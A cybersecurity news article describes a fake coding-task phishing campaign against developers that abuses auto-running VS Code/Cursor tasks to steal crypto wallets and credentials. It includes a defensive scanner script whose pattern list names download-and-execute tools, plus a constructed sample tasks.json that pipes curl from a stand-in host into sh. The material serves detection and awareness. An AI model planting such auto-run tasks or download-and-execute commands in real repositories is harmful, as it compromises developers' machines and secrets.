
North Korean Hackers Exploit Fake Coding Tasks to Steal Cryptocurrency


A recent analysis by the cybersecurity firm Proofpoint has revealed a large phishing campaign, believed to be linked to North Korean threat actors, that targeted software developers at nearly 100 organizations. The campaign, which Proofpoint tracks as UNK_DeadDrop, used fake job opportunities and requests for code review to lure developers into running malware that steals cryptocurrency wallet data and credentials.

In April and May 2026, more than 250 phishing emails were sent, primarily to individuals in the United States working in technology, education and finance, with a notable concentration on cryptocurrency firms. The emails typically linked to GitHub or GitLab repositories presented as coding assignments. Recipients were instructed to clone a repository and open it in a code editor such as VS Code or Cursor; opening the folder is what triggered the compromise.

The pretexts changed from week to week: job offers for full-stack developer and "agent lead" roles, requests for peer review of open-source code, tasks to test ERC-4626 smart-contract vaults, and projects to build AI-driven payment agents. Rotating the lure keeps it timely and relevant to the targeted developers and makes each request look like routine work.

Each repository carried a tasks.json file (the editor's task definition file, which lives in the hidden .vscode directory) configured to run a task automatically as soon as the folder was opened. This abuses a legitimate editor feature rather than a vulnerability: VS Code and compatible editors let a task be marked to run on folder open. VS Code mitigates this with its Workspace Trust prompt, which asks whether the folder should be trusted before such tasks run. According to Proofpoint, the Cursor editor showed no such prompt, so the payload ran with no interaction beyond opening the folder, which greatly increases the chance of infection.
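The check below is an added example written for this article, not code from Proofpoint or recovered from the campaign. It parses the tasks.json in every .vscode directory of a checkout (coping with the comments and trailing commas that file format allows), lists tasks marked `"runOn": "folderOpen"`, and flags commands that look like download-and-execute. The sample lure file and the suspicious-command pattern list are constructed assumptions for illustration; the folderOpen trigger itself is VS Code's documented task option.

```python
"""Pre-open check for a cloned repository: list VS Code / Cursor tasks that
start automatically on folder open ("runOptions": {"runOn": "folderOpen"}
in .vscode/tasks.json) and flag ones that look like download-and-execute."""
import json
import os
import re
import tempfile

# Heuristic command fragments typical of staged payloads. This list is an
# assumption made for the example, not an indicator published for UNK_DeadDrop.
SUSPICIOUS = re.compile(
    r"(curl|wget|Invoke-WebRequest|\biwr\b|node\s+-e|python3?\s+-c|base64|"
    r"powershell|\bsh\s+-c|\beval\b|/dev/tcp/|child_process)",
    re.IGNORECASE,
)

PLATFORM_KEYS = ("windows", "linux", "osx")  # per-OS overrides allowed in tasks.json


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments and trailing commas (tasks.json is JSON-with-comments),
    leaving string contents such as "https://..." untouched."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped character verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j < 0 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j < 0 else j + 2
        else:
            out.append(c)
            i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def task_command(task: dict) -> str:
    """Flatten command/args, including per-platform overrides, into one string."""
    parts = []
    for scope in (task, *(task.get(k) or {} for k in PLATFORM_KEYS)):
        parts.append(str(scope.get("command", "")))
        parts.extend(str(a) for a in scope.get("args", []))
    return " ".join(p for p in parts if p)


def scan_tasks_json(path: str) -> list:
    """Return the auto-run tasks declared in one tasks.json."""
    with open(path, encoding="utf-8") as f:
        data = json.loads(strip_jsonc(f.read()))
    findings = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = task_command(task)
        findings.append({
            "file": path,
            "label": task.get("label", "<unlabelled>"),
            "command": cmd,
            "suspicious": bool(SUSPICIOUS.search(cmd)),
        })
    return findings


def scan_repo(root: str) -> list:
    """Walk a checkout and scan every .vscode/tasks.json (nested workspaces included)."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            findings.extend(scan_tasks_json(os.path.join(dirpath, "tasks.json")))
    return findings


# Constructed sample lure (not a file recovered from the campaign): a harmless-looking
# "build" task that auto-runs and swaps in a downloader per platform.
LURE_TASKS_JSON = r'''{
  // comments and trailing commas are legal here, so the parser must cope
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
      "runOptions": { "runOn": "folderOpen" },
      "linux":   { "command": "curl -fsSL https://example.invalid/s.sh | sh" },
      "osx":     { "command": "curl -fsSL https://example.invalid/s.sh | sh" },
      "windows": { "command": "node", "args": ["-e", "eval(process.env.P)"] },
    },
    { "label": "test", "type": "shell", "command": "npm test" }
  ]
}'''

BENIGN_TASKS_JSON = '{"version": "2.0.0", "tasks": [{"label": "test", "type": "shell", "command": "npm test"}]}'


def write_samples(root: str) -> None:
    """Lay out two checkouts under root: one carrying the lure, one benign."""
    for name, body in (("lure", LURE_TASKS_JSON), ("benign", BENIGN_TASKS_JSON)):
        d = os.path.join(root, name, ".vscode")
        os.makedirs(d, exist_ok=True)
        with open(os.path.join(d, "tasks.json"), "w", encoding="utf-8") as f:
            f.write(body)


def run_demo() -> list:
    """Build the samples in a temp dir and scan them; returns the findings."""
    root = tempfile.mkdtemp(prefix="deaddrop-check-")
    write_samples(root)
    return scan_repo(root)


if __name__ == "__main__":
    for f in run_demo():
        flag = "SUSPICIOUS" if f["suspicious"] else "auto-run"
        print(f"[{flag}] {f['file']}: task '{f['label']}' runs: {f['command']}")
```

Run it against a freshly cloned repository before opening the folder in an editor. It is a review aid, not a guarantee: a lure can also stage its payload through a package-manager script or a git hook that this scan does not look at. Independently of the scan, setting VS Code's `task.allowAutomaticTasks` setting to `off` stops folderOpen tasks from starting until they are explicitly allowed.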

The payload differs by operating system. On macOS and Linux, the task's script installs a malicious VS Code extension posing as a legitimate Google service, so the malware is reloaded every time the editor starts. On Windows, the payload is JavaScript that runs inside the editor process itself and leaves no obvious files on disk, which makes detection harder.

Regardless of platform, the goal is the same: harvesting cryptocurrency wallets and credentials. The malware scans for browser data and cryptocurrency wallet applications, targeting browser-based wallet extensions such as MetaMask, Phantom and Keplr as well as desktop wallets such as Exodus, Electrum and Ledger Live. It also collects saved passwords and cookies from Chrome, Brave, Edge and Firefox.

On macOS and Linux the malware also displays a counterfeit password dialog to capture the user's password, then uses it to elevate privileges and unlock the system keychain or keyring where further secrets are stored. The Windows variant instead bypasses Chrome's app-bound encryption to decrypt the browser's protected data. After exfiltration, the malware removes its own traces to hinder forensic analysis.

Proofpoint noted similarities with Contagious Interview, a long-running North Korean operation that targets developers through fake recruitment, but tracks UNK_DeadDrop as a distinct cluster because of its email-led delivery, the scale of repository creation, and a self-contained payload that keeps working even after its infrastructure is disrupted.

Proofpoint has not definitively attributed the activity to a named actor and continues to track it as a separate cluster. North Korean-affiliated groups have reportedly targeted developers with such lures since at least 2022, using fake recruiter profiles and trojanized development tools to gain a foothold in sensitive systems and networks. The campaign underscores the persistence of state-sponsored threats against developers and the need for defenses, such as treating any cloned repository as untrusted until reviewed, that do not depend on the target spotting the lure.
